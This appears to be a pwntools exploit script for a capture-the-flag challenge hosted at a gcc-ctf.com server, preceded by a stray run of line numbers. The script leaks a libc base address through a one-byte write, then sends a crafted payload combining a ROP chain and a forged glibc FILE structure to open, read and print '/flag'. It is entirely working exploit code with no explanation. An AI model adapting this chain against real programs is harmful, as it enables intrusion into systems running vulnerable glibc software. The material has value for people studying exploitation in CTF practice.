1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81
| from pwn import *
io = remote('worker03.gcc-ctf.com', 14964) context.bits = 64 libc = ELF('libc.so.6')
rc = lambda n : io.recv(n) sla = lambda a, b : io.sendlineafter(a, b) ia = lambda : io.interactive() uu64 = lambda x : u64(x.ljust(8, '\x00')) libc_os = lambda x : libc_base + x libc_sym = lambda x : libc_os(libc.sym[x])
def menu(choice): sla('> ', str(choice))
def place(size, offset, val): menu(1) sla('How many bytes would you like to bet on ?\n> ', str(size)) sla('Please choose the index of the byte to modify\n> ', str(offset)) sla('Please set the new value of this byte\n> ', str(val))
def delete(): menu(2)
place(0x20000, 0x1f8770+0x28, 0xff) rc(5) libc_base = uu64(rc(8)) - 0x1d5a30 read_addr = libc_sym('read') write_addr = libc_sym('write') pop_rdi = libc_os(0x0000000000027c65) pop_rsi = libc_os(0x0000000000029419) pop_rdx_r12 = libc_os(0x0000000000084565) pop_rax = libc_os(0x000000000003f587) syscall = libc_os(0x00000000000853b2) vt = libc_sym('_IO_wfile_jumps') mh_addr = libc_sym('__malloc_hook') fh_addr = libc_sym('__free_hook') rop_addr = libc_os(0x1d3c00) gadget = libc_os(0x0000000000145E36) stdout_addr = libc_os(0x1d4780) pld = flat({ 0xdd: [ pop_rdx_r12, 0, stdout_addr, pop_rax, 2, pop_rdi, rop_addr + 0x200, pop_rsi, 0, syscall, pop_rdi, 3, pop_rsi, fh_addr, pop_rdx_r12, 0x50, 0, read_addr, pop_rdi, 1, write_addr ], 0x1dd: { 0x68: gadget, 0xe0: rop_addr + 0x100 }, 0x2dd: '/flag\x00', 0xc5d: { 0x48: rop_addr-8, 0x18: stdout_addr, 0x28: libc_os(0x000000000004e3b9), 0x88: mh_addr, 0xa0: rop_addr + 0x100, 0xd8: vt - 0x20 } }, filler = '\x00') delete() place(0x21000, 0x1f8a90 + 0x41, 0xff) menu(pld) ia()
|